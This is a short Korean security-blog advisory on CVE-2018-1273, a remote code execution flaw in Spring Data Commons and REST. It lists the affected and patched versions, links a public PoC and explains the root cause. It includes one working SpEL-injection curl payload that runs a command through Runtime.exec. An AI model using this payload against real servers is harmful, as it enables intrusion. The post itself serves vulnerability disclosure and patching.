취약점 ) CVE-2018-1273 Spring Remote code execution

IT Security/Vulnerability

취약점 ) CVE-2018-1273 Spring Remote code execution

로픽 2019. 10. 11. 10:25

CVE 취약점 코드

CVE-2018-1273

Vendor

Pivotal - Spring Framework

취약점 요약

Spring Data Common의 특정 버전에서 binding 관련 취약점 존재. 악의적인 사용자는 조작된 HTTP 매개변수를 전달하여 원격 코드 실행 공격 가능.

영향받는 버전

* Spring Data Commons 1.13 ~ 1.13.10

* Spring Data REST 2.6 ~ 2.6.10

* Spring Data Commons 2.0 ~ 2.0.5

* Srping Data REST 3.0 ~ 3.0.5

POC

https://github.com/wearearima/poc-cve-2018-1273

wearearima/poc-cve-2018-1273

POC for CVE-2018-1273. Contribute to wearearima/poc-cve-2018-1273 development by creating an account on GitHub.

github.com

공격구문

curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"

취약점 발생 코드

StandardEvaluationContext가 다양한 기능을 포함하여 임의의 코드 실행이 가능.

StandardEvaluationContext -> SimpleEvaluationContext으로 대체하여 제한된 권한을 설정.

java.lang.Runtime 및 java.lang.ProcessBuilder를 지원하지 않아 임의의 코드 실행이 불가능.

보완된 버전

* Spring Data REST 2.6.11(Ingalls SR11) 이상 업데이트 권고.

* Spring Data REST 3.0.6(Kay SR6) 이상 업데이트 권고.

'IT Security > Vulnerability' 카테고리의 다른 글

취약점) CVE-2018-7600 Drupal 원격 코드 실행 취약점 (0)	2020.03.10
취약점) CVE-2018-2628 Oracle Weblogic RCE 역직렬화 취약점 (0)	2020.03.02
취약점 ) CVE-2019-16759 vBulletin 제로데이 취약점 (0)	2019.10.10
취약점 ) CVE-2015-8562 Joomla 원격 코드 실행 (0)	2019.05.20
취약점) ThinkPHP 원격 코드 실행 취약점 POC (CVE-2018-20062) (0)	2019.03.24

현재글취약점 ) CVE-2018-1273 Spring Remote code execution

IT 정보 & Tip 을 포스팅하고 있습니다.

어플, python, 블렌더, 네트워크, 정보보안, 파이썬, 패킷트레이서, 안드로이드 어플, 자격증, 라우터, C언어, 자바, Java, Blender, 정보기기운용기능사, 안드로이드, Android, 리눅스, 프로그래밍 언어, AWS,

Today :
Yesterday :

로픽의 IT블로그